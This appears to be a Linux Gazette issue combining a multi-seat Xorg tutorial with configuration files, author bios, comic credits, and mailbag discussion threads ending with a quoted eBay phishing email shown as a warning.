Our own scripts were exclusively written with the help of Perl and Bash. This article includes all necessary scripts and configuration files to tackle a mail migration from CommuniGate Pro to Postfix/Cyrus/OpenLDAP. From then on, you need more tools such as front ends for user administration. There are some tools you can use, or you can also write your own. It depends on what you need.
No animals or software were harmed in the course of the migration. You might wish to take a look at the following tools and recipes and thank their authors.
Talkback: Discuss this article with The Answer Gang
René was born in the year of Atari's founding and the release of the game Pong. Since his early youth he started taking things apart to see how they work. He couldn't even pass construction sites without looking for electrical wires that might seem interesting. The interest in computing began when his grandfather bought him a 4-bit microcontroller with 256 byte RAM and a 4096 byte operating system, forcing him to learn assembler before any other language.
After finishing school he went to university in order to study physics. He then collected experiences with a C64, a C128, two Amigas, DEC's Ultrix, OpenVMS and finally GNU/Linux on a PC in 1997. He is using Linux since this day and still likes to take things apart und put them together again. Freedom of tinkering brought him close to the Free Software movement, where he puts some effort into the right to understand how things work. He is also involved with civil liberty groups focusing on digital rights.
Since 1999 he is offering his skills as a freelancer. His main activities include system/network administration, scripting and consulting. In 2001 he started to give lectures on computer security at the Technikum Wien. Apart from staring into computer monitors, inspecting hardware and talking to network equipment he is fond of scuba diving, writing, or photographing with his digital camera. He would like to have a go at storytelling and roleplaying again as soon as he finds some more spare time on his backup devices.
pooz is a system administrator/Web application hacker working in Vienna, Austria. Free/Open Source software has been his tool of choice since early 90s.
By Bob Smith
A Multi-Seat Linux Box: This tutorial shows how to build a multi-head, multi-user Linux box using a recent distribution of Linux and standard USB keyboards and mice. Xorg calls this arrangement a "multi-seat" system.
Advantages of a Multi-Seat System: The advantages of multi-seat systems in schools, Internet cafes, and libraries include more than just saving money. They include much lower noise pollution, much less power consumption, and lowered space requirements. For many applications, power and noise budgets are as important as initial cost.
Requirements: To build a multi-seat system you need a video adapter, keyboard, and mouse for each seat. For six seats, you'll also need a motherboard with an AGP slot and five available PCI slots. In our test system we used USB keyboards and mice exclusively, but you can use a PS/2 keyboard and mouse for one of the seats if you wish.
Xorg 6.9 or later is required, but this already ships with many of the major distributions. Our test system uses the free version of Mandriva 2006 and we did not rebuild the kernel or install any additional packages.
If possible, try to use accelerated video cards, but for increased reliability, avoid video cards with on-board fans. Use recent video cards; older video cards often have a problem sharing the PCI bus. We've had good luck with nVidia cards but you can try recent cards from other manufacturers too.
Hardware for our test system: For our system we chose to use video cards based on the nVidia MX4000 chipset. They are accelerated, have no fans, and it was nice having one driver for all six video cards. The downside of nVidia is that the driver is closed source and you need to download and install it. If you use an nVidia card, be sure to check their web site for the recommended BIOS settings for your cards.
We used an ECS 755-A2 motherboard with an AMD64-3200 processor and 1 GB of RAM. Our power supply is a CoolMax 140mm Power Supply and the CPU heat sink is a Thermaltake "Sonic Tower". During our testing we added a low noise fan to cool the video cards. Airflow is in at the bottom, past the video cards, up past the CPU cooler and out through the power supply. This airflow seemed to work pretty well. At quiescence, the CPU temperature was 31C, rising to only 38C after fifteen minutes of kernel compile. The current from the mains at quiescence was 0.25 amps, and during a kernel compile it was 0.35 amps.
You will probably need some USB hubs to connect all of the keyboards and mice. One problem to think about before permanently installing the hardware is cable management. Seven power cords, six monitor cables, three USB hubs, six keyboard cables, and six mice cables: that is a lot of cabling!
Do the installation with all of the hardware connected and powered up. Mandriva did a great job detecting and configuring all six of our video heads. Select a default run level of 3 so that X does not start automatically after boot. You can check the installation by logging in and running startx. If all has gone well you should be able to move your mouse across all six monitors.
Mandriva allows up to ten entries in the /dev/input directory. We
needed twelve since we had six keyboards and mice. We increased the
limit to sixteen by changing the line in /etc/udev/ruled.d/50-mdk.rules
from:
KERNEL=="event[0-9]*", NAME="input/%k", MODE="0600"
to:
KERNEL=="event[0-9a-f]*", NAME="input/%k", MODE="0600"
Video cards are identified by their address on the PCI bus. We can list the hardware on the PCI buses using the lspci command. On our test system, the lspci command gives the following result:
lspci | grep VGA 00:09.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1) 00:0a.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1) 00:0b.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1) 00:0c.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1) 00:0d.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1) 01:00.0 VGA compatible controller: nVidia Corporation NV18 [GeForce4 MX 4000 AGP 8x] (rev c1)The bus address is the first field in the lines above. The number before the colon identifies which PCI bus (computers often have more than one), and the second number gives the card address on the bus. You will need to know these addresses to build the xorg.conf configuration file.
The mice are easy to locate. Each mouse has an entry in the /dev/input directory. An ls can identify the mice.
ls /dev/input/mouse* /dev/input/mouse0 /dev/input/mouse2 /dev/input/mouse4 /dev/input/mouse1 /dev/input/mouse3 /dev/input/mouse5The keyboards are identified as a /dev/input/eventN file. Do a more of /proc/bus/input/devices. Each keyboard will have an entry that specifies the event file. The following two entries are for the first two keyboards in our system.
more /proc/bus/input/devices I: Bus=0003 Vendor=046e Product=530a Version=0001 N: Name="BTC Multimedia USB Keyboard" P: Phys=usb-0000:00:03.3-4.2.1/input0 H: Handlers=kbd event6 B: EV=120003 B: KEY=1000000000007 ff87207ac14057ff febeffdfffefffff fffffffffffffffe B: LED=1f I: Bus=0003 Vendor=046e Product=530a Version=0001 N: Name="BTC Multimedia USB Keyboard" P: Phys=usb-0000:00:03.3-4.4.1/input0 H: Handlers=kbd event7 B: EV=120003 B: KEY=1000000000007 ff87207ac14057ff febeffdfffefffff fffffffffffffffe B: LED=1f
A table is a nice way to view all of the above information.
Seat | Video Card | Keyboard (/dev/input/) |
Mouse (/dev/input/) |
---|---|---|---|
0 | 00:09:0 | event6 | mouse0 |
1 | 00:10:0 | event7 | mouse1 |
2 | 00:11:0 | event8 | mouse2 |
3 | 00:12:0 | event9 | mouse3 |
4 | 00:13:0 | event10 | mouse4 |
5 | 01:00:0 | event11 | mouse5 |
Note the slight change in how the video cards are addressed. Also, you'll find the numbering of the keyboards and mice easier if you plug each mouse into the same hub as its corresponding keyboard. Don't worry too much about matching the video head to the keyboard. After setting everything up you can move the monitors or the keyboards around as needed.
# Seat 5 Section "InputDevice" Identifier "Keyboard5" Driver "evdev" Option "Device" "/dev/input/event11" Option "XkbModel" "pc105" Option "XkbLayout" "us" Option "XkbOptions" "compose:rwin" EndSection Section "InputDevice" Identifier "Mouse5" Driver "mouse" Option "Protocol" "ExplorerPS/2" Option "Device" "/dev/input/mouse5" Option "ZAxisMapping" "6 7" EndSection Section "Device" Identifier "device5" Driver "nvidia" VendorName "NVIDIA Corp." BoardName "NVIDIA GeForce4 (generic)" BusID "PCI:0:13:0" EndSection Section "Monitor" Identifier "monitor5" ModelName "Flat Panel 1024x768" HorizSync 31.5 - 48.5 VertRefresh 40.0 - 70.0 ModeLine "768x576" 50.0 768 832 846 1000 576 590 595 630 ModeLine "768x576" 63.1 768 800 960 1024 576 578 590 616 EndSection Section "Screen" Identifier "screen5" Device "device5" Monitor "monitor5" DefaultDepth 24 SubSection "Display" Virtual 1024 768 Depth 24 EndSubSection EndSection Section "ServerLayout" Identifier "seat5" Screen 0 "Screen5" 0 0 InputDevice "Mouse5" "CorePointer" InputDevice "Keyboard5" "CoreKeyboard" EndSectionThere is a simple trick to help verify that all the numbers in the xorg.conf file are right -- pass the file through sort and uniq.
sort /etc/X11/xorg.conf | uniq
[ 'sort xorg.conf|uniq -d' would also be helpful - just in case you had mistakenly repeated any of the device strings. -- Ben ]
The output of the above command string will make obvious any errors in numbering the various keyboards and such.
Testing Your Xorg.conf File: It is a good idea to test
your configuration and to sort out the keyboards and mice by
bringing up the heads one at a time. Login remotely so that you
are not using any of the video heads. Enter the following commands
for each of the six heads (0 to 5). (The commands below are for
head 5.)
X -novtswitch -sharevts -nolisten tcp -layout seat5 :5 & xterm -display :5 &If the above command fails, examine the error messages and check the xorg.conf file. If the command succeeds, use the xterm to help identify which keyboard and mouse go to which head. The keyboards, mice, and video cards are enumerated in the same order on every boot, so you will only have to move things around during the initial set up.
The above commands might be sufficient if you don't need user logins. For example, a six headed kiosk might need only X and a web browser on each head.
Modify the [servers] section near the bottom of the /etc/X11/gdm/gdm.conf file to tell gdm which X servers to start. The lines should be:
0=Standard0 1=Standard1 2=Standard2 3=Standard3 4=Standard4 5=Standard5You need to tell gdm how to start the X server on each head. The lines to do this are:
[server-Standard5] name=Standard server command=/usr/X11R6/bin/X -nolisten tcp -novtswitch -sharevts -layout seat5 flexible=trueYou'll need a section like the above for each head. The server name, "Standard5" in the above example, must match the name given in the [servers] section. Customize the X command line options to meet the requirements of your particular system.
Once everything is configured, you should be able to start graphical logins by switching to runlevel 5.
telinit 5If everything works, make the default runlevel 5 by editing /etc/inittab or by setting it using drakconf.
Cost: Not including the monitor, each seat in our system cost about $67. This includes $40 for the MX4000 based video card, $20 for a USB keyboard, $5 for a USB mouse, and $2 for half of a USB hub. Our test system used expensive keyboards that have a built-in USB hub which we intended for per-user flash drives or audio players.
The shared part of our system cost about $520. This includes $180 for the CPU, $50 for the motherboard, $90 for RAM, and $50 for the CPU heat sink. The case, power supply, and disk drive had a combined cost of about $150.
We give these prices just for comparison. You may find lower prices that these and we'd certainly recommend that you replace our $230 CPU and motherboard with an Athlon 2800+ set that costs about $80. We have not included the cost of the monitors since these prices are in free fall and your particular needs and tastes may dictate what you spend.
Problems: Did you catch the phrase "between resets" above?
While the system worked very well, it was extremely unstable. In
particular, we got a kernel oops fairly often when we logged out.
A syslog trace of one such oops is available
here. We've tried several things to fix this problem including:
A much less severe problem is that some programs assume that there is a single user on the PC. Screen savers can take a lot of CPU power and both KDE and Gnome complain if they don't have audio output. Any shared resource, such as audio or a CD burner, can be a problem.
As a longer-term concern, we will need to address security issues surrounding multi-seat computers. Whether from students or cafe patrons, these systems are going to come under deliberate, malicious attack. Can we trust KDE and Gnome to withstand such attacks?
Xorg man pages: Xorg provides a full set of manual pages that
describe the xorg.conf file and all of the commands used in getting
X-Windows to run. The manual page for xorg.conf is at:
http://wiki.x.org/X11R6.9.0/doc/html/xorg.conf.5.html
The manual pages for the X commands are at:
http://wiki.x.org/X11R6.9.0/doc/html/manindex1.html
Talkback: Discuss this article with The Answer Gang
Bob is an electronics hobbyist and Linux programmer. He is one of the authors of "Linux Appliance Design" to be published by No Starch Press.
These images are scaled down to minimize horizontal scrolling.
All HelpDex cartoons are at Shane's web site, www.shanecollinge.com.
Talkback: Discuss this article with The Answer Gang
Part computer programmer, part cartoonist, part Mars Bar. At night, he runs
around in his brightly-coloured underwear fighting criminals. During the
day... well, he just runs around in his brightly-coloured underwear. He
eats when he's hungry and sleeps when he's sleepy.
The Ecol comic strip is written for escomposlinux.org (ECOL), the web site that supports es.comp.os.linux, the Spanish USENET newsgroup for Linux. The strips are drawn in Spanish and then translated to English by the author.
These images are scaled down to minimize horizontal scrolling.
All Ecol cartoons are at tira.escomposlinux.org (Spanish), comic.escomposlinux.org (English) and http://tira.puntbarra.com/ (Catalan). The Catalan version is translated by the people who run the site; only a few episodes are currently available.
These cartoons are copyright Javier Malonda. They may be copied, linked or distributed by any means. However, you may not distribute modifications. If you link to a cartoon, please notify Javier, who would appreciate hearing from you.
Talkback: Discuss this article with The Answer Gang
Fri, 03 Feb 2006
From Susan Brown
[Jimmy] I just find this incredibly amusing... but, I am easily amused
James,
If you are a superstar and have exceptional customer service skills, come join our professional team!
$SPAMMERIFFIC Corporate Resources is currently seeking a top-notch staffing manager to work with our light industrial team. This is a staff position located within $SPAMMERIFFIC.
$SPAMMERIFFIC Corporate Resources is a regional market leader in the delivery of diversified, high quality employment services. We offer a complete range of employment opportunities: temporary, temporary-to-hire, direct-hire and contract. $SPAMMERIFFIC specializes in placements for administrative and clerical positions, accounting and finance, legal/medical, mortgage/insurance, professional/technical, light industrial, and engineering. $SPAMMERIFFIC brings top-flight companies and outstanding professionals together. We care about character and quality, and our passion is to match the world's most innovative people with the world's most innovative companies. And we strive to do it better than anyone else!
Position requires; strong organizational skills; ability to work as part of a team; strong communication and time management skills; a drive to succeed; ability to multi-task, good follow through, and professional demeanor. This position offers a competitive pay structure including commission and benefits! E-mail resume and salary requirements to head_spammer@spammeriffic.com.
www.$SPAMMERIFFICcorp.com
********************************************************************** The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. **********************************************************************
[Jimmy] I love these... I think I'll collect the whole set
Sat, 04 Feb 2006
From Jerry Matheny
[Jimmy] Ah. I guess Ben changed the old list addresses in the back issues...
Are your the "Big D from LV"?
Wed, 15 Feb 2006
From Benjamin A. Okopnik
From Bruce Schneier's "Cryptogram":
The Department of Homeland Security is funding the security of
open-source products, including Linux, Apache, MySQL FreeBSD, Mozilla,
and Sendmail. I think this is a great use of public funds. One of the
limitations of open-source development is that it's hard to fund tools
like Coverity. And this kind of thing improves security for a lot of
different organizations against a wide variety of threats. And it
increases competition with Microsoft, which will force it to improve
its OS as well. Everybody wins.
http://www.eweek.com/article2/0,1895,1909946,00.asp
[Jimmy] This spawned a long thread...
See attached dhs.html
[Jimmy] There was also a lengthy thread about the use of flash in LG
See attached flash.html
Mon, 06 Feb 2006
From Predrag Ivanovic
I would love to see your answers(I got 8/33 ). This is hard.
[Jimmy] I was talking about this sort of thing with a girl I know the other day. To really know a language, you have to know the popular culture in that language, the kinds of things kids learn, etc. To her credit, she has been reading some English-language fairy tales -- I can think of quite a few movies and books that would make absolutely no sense if you had never heard "Little Red Riding Hood", for example.
At least it says "if you excuse the cultural bias".
[Brian] But perhaps not biased enough. I didn't see "50 W to L Y L", nor did I see "1 is the L N". Even though I went to a school where rugby was played (although my mission was to drink the beer), I missed that one (and several others)
There certainly should have been "2 W on a P", in our context.
27/33
[Jimmy] I'll bet you didn't get 3 B M (S H T R): 3 blind mice (see how they run). "39 B of the O T" nearly eluded me, as I was raised to consider there to be 45, not 39
[Breen] Cultural bias indeed. I don't think many on this side of the pond would have got 6 B to an O in C. (I did but I'm eccentric...)
[Frodo] LOL - I guess you are in a minority indeed with that answer, in North America.
The one that took me longest was "9 P in S A" - I was never taught that fact in school.
[Breen] I noticed the O T ambiguity, too.
[Frodo] The only reason I got that one, was cause it said "66 B of the B".
[Jimmy] Erm... still the same thing, because C have the 6 B of the A.
[Jimmy] Oh... 25/33
[Breen] 30/33 here.
[Frodo] Almost ashamed... 33/33
My love for trivia quizzes and such helped, I guess.
[Breen] Quizzes like this have been around for quite a while - I first saw one about 25 years ago in Games Magazine - it even had some of the same questions.
[Sluggo] But what does this have to do with intelligence? It's just recognizing pop phrases.
[Jimmy] Not really. Many of the items were facts that most people should be able to recognise: 90 D in a R A, 24 H in a D, etc. Some were extremely culturally biased: I only figured out "6 B to an O in C" after Breen mentioned being on the wrong side of the pond for it
[Kat] The process of "solving the puzzle" is a certain sort of brainpower. Sorta.
Meanwhile, I've managed to get to 32/33, but #30 is still eluding me.
[Ben] [grin] So how many did you get, Mike? As it says at the bottom, it tests verbal ability and linguistic pattern recognition - which are, in large measure, what many IQ tests consist of. You should do pretty well.
Me, I'm giving up after spending most of an hour on it; it's obvious that I'm dumb as a brick. On the other hand, I've got a strong suspicion that the four I didn't get (14, 19, 30, and 31) have to do with things that I just have no clue about - i.e., I think 31 has something to do with cricket, and 19 is some damn special version of 'unlucky Friday' that I just can't get.
[Brian] And of course I suffer the fate of smartasses everywhere. A flip answer springs to mind (say, "13 Levels in Barad Dur"), and the true answer has no route past the image thereby entrenched.
[Ben] [LAUGH] Yeah. I got hung up on the whole Bible-related tone of the thing for a while (how the heck would I know about that stuff, other than just having basic familiarity with the context and the poetry of the thing?) - couldn't get past "in C" looking like "in church" every time I looked at it.
[Brian] But those sorts of teasers are fun, although I suspect far less indicative than some believe.
[Ben] It's not usually the type of thing that I'm into - although this one was fun. I used to do the NY Times crossword puzzle on the way to work when I was living in Brooklyn. The train took 52 minutes (+/- a minute or two) from my stop to 34th Street in Manhattan, and I could usually finish it before I got off the train - although Fridays were tough (about 50/50). I don't know if they still do this, but the crosswords in NY Times used to get progressively harder throughout the week.
[Kat] Yes, they do, so far as I know.
[Breen] They certainly do. Saturday is the toughest. Sundays are sui generis - a completely different sort of puzz (besides being 21x21 instead of 15x15). [I also hang out online with puzzle constructors.]
[Kat] Incidentally, when I passed this link on to a puzzle-loving friend, I was informed that it's actually copyright Games magazine.
[Breen] Right - although you can't easily copyright the type of puzzle, many of the clues are right out of the original in Games lo, these many years ago.
[Sluggo] I think I've said it before, but...
Two plus two is four Four times three is twelve Twelve inches make a ruler A famous ruler was Queen Elizabeth Queen Elizabeth sailed the ocean Oceans have fish, fish have fins The Finns fought the Russians Russians are red, so fire engines are red 'Cause they're always rushin'
'Course, when did Lizzie I ever get in a boat? Or is this II?
[Jason] Got about half of them, the gave up/got bored. Tried to look in the javascript to see what the answers were for the ones I missed, but they were smart enough to use SHA1. But we know the first letter of each word, and only a couple words are unknown for each question, so a dictionary attack is probably feasible...
[Thomas] B T C, J. For the record, I scored 25. It's not an intelligence test in the slightest mind -- so don't feel bad about any of it.
[Jimmy] It only dawned on me yesterday what "100 C in a D" was. While I was shaving. Ouch!
[Rick] It's a bit culture-biased, isn't it?
[Kapil] Some entirely outrageous ones have been included in an effort to make the test more "culture-inclusive". One of my friends discovered what "9 P in S A" was and even with "Google Earth" or the equivalent I wouldn't have ever known enough to answer that.
In fact, some of the culture-specific ones were easier for me because I assumed that the author of these tests had a certain cultural bias and factored that in into the guesses I made. So even though I didn't know (e.g.) that there were "39 B in the O T" I could guess the answer and then the web page (with JavaScript enabled) verified that my guess was correct.
I liked the way the author of the tests had made them impossible to cheat on. Maybe it is now standard practice for on-line tests but it was a new one on me.
[Rick] But, e.g., the Brits might find "100 P in a P" somewhat mysterious.
[Jimmy] 100 peas in a pod?
[Jay] It's harder when they don't have the intelligence themselves to parse the responses only for keywords. If leaving out the number they put on the prompt from the reply makes me wrong, I'm smarter than they are, and I can't be bothered.
Mon, 23 Jan 2006
From Benjamin A. Okopnik
[Jimmy] This thread kept going...
Yes, but for *whom?*
http://www.gmtoday.com/news/technology/computers/topstory20.asp
Seems that Vista is going to require machines with more resources than (my estimate) half the US population, and probably 95% of the people in the rest of the world, own.
To be sure, Microsoft has said lesser computers will still be capable of running Vista, just with some of the special features that differentiate it from older versions of Wind0ws automatically turned off.
"Lesser" computers? I love it.
Dell has a section on its Web site, at www.dell.com/vista, which highlights computers the company recommends for those planning to upgrade to Vista. For models for the home and home office, the recommended desktop is priced at $1,749. The laptop costs $2,699.
Better and better, every day. Y'all ready to rush right out and buy the top-buck gizmo of the day?
[Pedja] Ben, Vista is scheduled to launch at Christmas this year,right? Do you think that is a coincidence? By that time, "Vista-ready" computers (Micr0$0ft's recommended hardwareX2) won't be all that uncommon,and Christmas shopping madness will do the rest. Same story was when XP launched, what, 5 years ago?
It's the same old formula that Micr0s0ft has been using all along - however, at this point, it's been turned on its head. Yes, the US is where most of the computer buying power is - but the top of the market is by far not the only buying public out there. Neither Joe Average in Chicago nor his cousin Giuseppe Averaggio in Milan (nor most of their other relatives all over the world) can afford to just toss their current system just because Micr0s0ft has decreed that they should; aside from the expense, other considerations - e.g., the hassle of installing all the new hardware, dealing with replacing anything that fails to work, adapting to the new system, "upgrading" the software that turns out to be non-compatible with their new OS - make it a very low-percentage game. Yeah, there are new adopters all over the place - but many of those have already installed Linux, anyway. Yeah, there are companies that, for various (generally non-technical) reasons will "upgrade" to Vista... but given the general awareness of Linux now, and the fact that people realize that changing over is going to require adapting anyway, there's a certain (and I believe, large) percentage of people that will decide to get out of that game and switch to Linux.
This is besides the fact that there are more and more companies and individuals switching over every day.
(*Don't* anybody breathe. If Micr0s0ft actually falls for this one, we're home free.)
[Pedja] Will you please explain?
Sure. If you don't have a whole lot of spare cash, and your computer is becoming less and less useable day by day (remember what happened shortly after XP appeared?)
[Pedja] Yes, the hype was massive. "The only OS you'll ever need,mangles your files and cures cancer (has dancing hamster in technicolor, too!)". Heh. That's madness, I tell you, madness...
- and particularly if you need to produce documents, etc., for business purposes _and can't_ due to progressive OS/software incompatibilities, then where are you going to go? This kind of heavy-handed, bull-in-a-china-shop moves by the Redmond folks drive wagonloads of people over to Linux, and from a certain cynical perspective, I'm actually glad to see them doing it.
[Pedja] Arrogance will bury them, DRM and 'trusted computing' too. Imagine Joe Average User trying to rip his S0ny 'enhanced' CD using WMP 11, or installing 'unapproved' software to his brand new Vi$ta machine, and failing. Imagine man realizing that he is 0wned and his freedom to do whatever he bloody wants with things he payed for, taken away from him 'for his own good'. Imagine his anger and frustration. And then he hears of this Linux thing, which has its own quirks, but it's all about freedom. Is this a dawn of the new era, Ben? We can only hope so .
Fri, 10 Feb 2006
From Mike Orr
http://seattlepi.nwsource.com/theater/259118_wedding11q.html Review of "The Wedding Singer" play, a 1985 cliche-o-drama
(No, I haven't seen it.)
[Jimmy] Looks like it's based on the Adam Sandler movie.
On a similarly 80s note, I whiled away the hours at work last night listening to The Cure's Greatest Hits
[Thomas] Which? Staring At The Sea was a nice album.
[Jimmy] Greatest Hits. It's a CD/DVD package.
[Thomas] Talking of which, I'm listening to The TearDrop Explodes. I much preferred Julian Cope's solo work -- but it's still good, nevertheless.
[Jimmy] Never really got into them, though I do get mixed up between them and Echo and the Bunnymen, for some strange reason.
I suppose I'll find out when my sister gets into them -- she has a bad case of 80s envy
[Thomas] That's not so strange when you consider that Ian McCulloch who was a brief member of The Teardrop Explodes, went on to be the lead singer for Echo and the Bunnymen.
[Jimmy] Ah. Well, Dave Fanning (Ireland's closest equivalent to John Peel) used to play them, but at the time I was more into grunge and punk[1] stuff.
I miss those simpler times, when MTV played music, and everything was on one channel, so you were exposed to different genres instead of just whatever's in favour with 14 year old girls today.
My friend is a writer for Time, which owns People. He says People is by far the best selling magazine in the industry. I couldn't believe it, who reads People? But it's all those women in check-out lines picking it up.
[Jimmy] Don't forget doctors' and dentists' waiting rooms!
[Thomas] This is true. I can remember, about six/seven years ago when my parents first got sky. The MTV2 channel back then would just play continuously in one hour slots, listeners' requests for music videos.
[Jimmy] Eek. I'm thinking about, say, 11 years ago when there was just one MTV Europe, and everything was... well, like MTV2 as you described
They did have some oddball programmes with the odd live band, but mostly it was music with a minimum of chatter.
[Thomas] Typically there'd be fifteen songs in an hour. It was great. The ecclectic mix of music and genres was indeed an eye-opener.
There's a new American radio format like this, although it's programmed rather than requests. They have a large playlist of a wide variety of rock genres (60s-00s), and they play them in a random order even if it puts dissimilar songs next to each other. Supposedly it's popular because people are tired of the same old songs again and again. It was started by one network ("JACK FM") but there are other stations doing it too. The LA station has the most interesting website: http://www.931jackfm.com
[Thomas] Alas, the format is no more -- and it has gone the American way of: "Random talking with whiny Amercians is what the people want, whilst getting out of playing music."
[Jimmy] Well, they still have those kinds of programmes, but only at insomniac hours
They even have a metal show that plays videos by bands like Nile. Much as I love them, I don't understand why they bother to make videos, knowing they have such a limited appeal.
[Jimmy] (Queens of the Stone Age's "Songs for the Deaf" album has fake American DJ banter between songs. One of the best goes "K.L.O.N. - Clone Radio. We sound more like everybody else than anybody else". Rings oh-so-true
[1] Though probably not anything Mike would consider to be punk, apart from the Sex Pistols and the Ramones. Maybe
[Thomas] Patti Smith.
Haha. I have a soft spot for the early "non-punk" punk bands like Blondie. But for later punk, it's gotta be like early 80s oi/punk or I'm not interested. Innovation is fine -- psychobilly is cool, and I'd like to hear more punk/surf (Agent Orange). Just keep the same tempo and stacatto. And my adversion to metal influences in punk remains.
[Jimmy] I like the hardcore stuff... punk, but faster, and with musical ability. But, as I've said before, that stuff didn't come from having metal influences; if anything, the reverse was the case.
Hardcore is too monotonous for me. No, it didn't come from metal. I'm talking about metal influences on individual bands or the punk/metal hybrids, as well as Motorhead and AC/DC sneaking into punk bands' repitoire. Like this one local band Contingent an acquaintance sings in. It's called hardcore. Um, no it isn't.
[Jimmy] Well... you can't really help AC/DC slipping in as an influence for almost any rock band since the 70s. Or Spinal Tap
Not just an influence. Dropkick Murphys actually perform AC/DC songs at shows.
Punk attitude: angry losers Punk music: fast but not extremely, stacatto, unique rhythms and vocal styles Punk look: trim and tight Metal attitude: arrogant Metal music: outgrowth of hard rock (Zeppelin, Hendrix, psychedelic), non-danceable, frequently screaming vocals, quasi-ballads Metal look: scruffy Post-punk attitude (grunge etc): resigned losers Post-punk music: a wide variety, borrows more from rock Post-punk look: scruffy, slacker (plus a lot of other variations)
Notice the difference?
[Jimmy] Sure, not that I agree
I've actually been going back to my New Wave roots. Missing Persons, Bowie, Duran Duran, the Police -- all monstrosities I've re-acquired recently. My own personal 'fuck you' to the record industry (see SWF thread) and the output of most current bands. Plus a little bit of "real men do listen to new wave (and eat quiche)" rebellion.
[Jimmy] Eep. My roots are bands like Smashing Pumpkins and Soundgarden, so there's not much digging for me to do.
Actually not digging. The record stores are giving them away for $4 because nobody wants them. Your stuff would be at the recently-inflated price of $9 (used). Plus I can get them on vinyl rather than CD, so I avoid the CD premium.
[Thomas] This is something I am seeing a lot here too. What I would class as "good" music is being put in these so-called "bargain buckets" as a quick sale. Bands like 'Love' are always in there. It's even more a shame in that although 'Forever Changes' as an album is rated very highly, it's also degraded -- it now has a label of being "passed its time", simply because it's so common to see it in these bargain buckets.
I couldn't believe an ad I saw yesterday, offering The Clash and other classic albums for the "great discount price" of $8.99. Ahem? For albums that have been out for years and have long paid for themselves and should now be worth $6?
[Thomas] See above. I found my copy of Mellow Candle's Swaddling Songs that way.
[Jimmy] Hmm. I don't mind buying remastered albums on CD for more than they would be worth normally, as long as there's something other than a fresh mix. A few of the early Cure albums now come with a second CD of outtakes etc., which is worth it (and makes me glad I didn't rush out and buy them a few years ago
The worst thing about listening to metal is that metal labels like Roadrunner are really into ripping off fans: every album is released twice; first in a jewel case, then six months later in a digipack with bonus tracks. It's impossible to tell in advance whether or not the bonus tracks are worth waiting for -- more often than not they're just live tracks -- but it really seems like a punishment for liking a band enough to buy their album as soon as it comes out.
I made that mistake once with Radiohead's "Hail to the Thief". Both versions were released simultaneously, but I wanted the "special" artwork in the cardboard case, which turned out to be nothing special.
What's funny is, new wave albums will soon become collectors' items and disappear from the record stores, and reappear on eBay for $100 each. Even ones that you thought should never have seen the light of day. I thought a lot of used stuff like the Clash would always be plentiful, but it has already disappeared into collectors' hands, at least around here. If I'd've known that, I would have kept all the records I'd gotten rid of over the years. I had all my CDs stolen in 2000, and some of the Industrial stuff is practially irreplaceable now.
[Jimmy] Well... my CD collection has basically been merged with my brother's. Not a problem while we're both at home, but I'm moving out next week... I'll probably just leave my CDs here rather than go through the inevitable "who owns what" arguments. (And partly because I'd rather use my MP3 player, and don't own a CD player anyway
I was never really into buying things for the sake of collecting -- I'm more interested in the contents than the physical item -- but there are a few albums that I'm glad I own on both vinyl and CD because of the artwork. If I ever find "Master of Puppets" or "Reign in Blood" on vinyl, my normally subdued collector's instinct will take control
I generally don't collect things for resale. It's more a matter of keeping things you'll never find again, that you're likely to want later. Or if you like a certain subculture, building up a "complete" collection of used items over the years. ("See! I got all of this used. This one came from a thrift shop, this one from a garage sale, this one a friend gave to me, this one I got while visiting England, this one a friend brought me when he was visiting the US...")
But in the 80s and 90s I was moving a lot, so I was more interested in being portable and lightweight than saving stuff. In high school, My cousin came to live with us with all her possessions in a Volkswagon, and I thought, "Wow, that's cool." I never managed that, my moves went up from two pickup truckloads to four, but that's mainly coz I have furniture now. [1] In high school (1982) I could always find 60s old album I wanted used, from Beatles to Kinks to Jefferson Airplane, and I loaded up on Rush. I just assumed that would always be the case, so I unloaded anything I didn't have an immediate want for. But I didn't anticipate how short-lived the Industrial and Ambient eras would be or how quickly the material would disappear. Maybe it's just coz I moved from mainstream music to obscure music, and that always happens with obscure music.
[1] Henry Rollins' bed story is so funny. He had a favorite futon that he used for eight years, so it was all scrunched down now. His girlfriend saw it and said, "Henry! You can't sleep on that! We have to get you a proper bed." So she dragged him to the bed store. He told the clerk, "I've never shopped for a bed before. How do you do it?" The clerk said, "Just lie down on several till you find one you like." So he did, and one bed was so comfortable it talked to him, "Come to Henry!" So he bought that one. But he couldn't bear to get rid of his beloved futon, so he kept it under the bed.
[Jimmy] Though I have managed to track down some obscure Irish bands recently: Scheer were the most recent
Sat, 07 Jan 2006
From Daniel J. Priem
For such problems i use http://btmgr.webframe.org/ smart boot manager.
[Rick] So close to a senryu, and yet so far.
Sun, 29 Jan 2006
From Jimmy O'Regan
http://www.comics.com/comics/pearls/archive/images/pearls20060121046729.jpg
Fri, 17 Feb 2006
From Benjamin A. Okopnik
Here's one that might get past a number of people; other than the way-too-crude XSS attack imitation, it's going to be rather effective for a certain segment of the population.
About a day ago, Kat put up some of our boat cruft up on eBay. Last night, I got this email:
Your registered name is included to show this message originated from eBay. Learn more. [hdrLeft_13] Question about Item -- Respond Now eBay eBay sent this message on behalf of an eBay member via My Messages. Responses sent using email will go to the eBay member directly and will * include your email address. Click the Respond Now button below to send your * response via My Messages (your email address will not be included). [s] Question from rubyndao [s] Marketplace Safety Tip Marketplace Safety Tip This message was ! sent while Always remember to complete your transactions the listing was active. on eBay - it's the safer way to trade. rubyndao is a potential buyer. Is this message an offer to buy your item directly through email without winning the item Hi, ******************** on eBay* If so, please help make the eBay *Respond to this * marketplace safer by reporting it to us. These I would like to *question in My * external transactions may be unsafe and are know S&H and *Messages. * against eBay policy. Learn more about trading also if you * * safely. have a buy it *http:// * now *contact.ebay.co.uk* */ws/eBayISAPI.dll * Thanks *M2MContact&item= * Is this email inappropriate* Does it breach *4589070441& * eBay policy* Help protect the community by Ruby *requested= * reporting it. 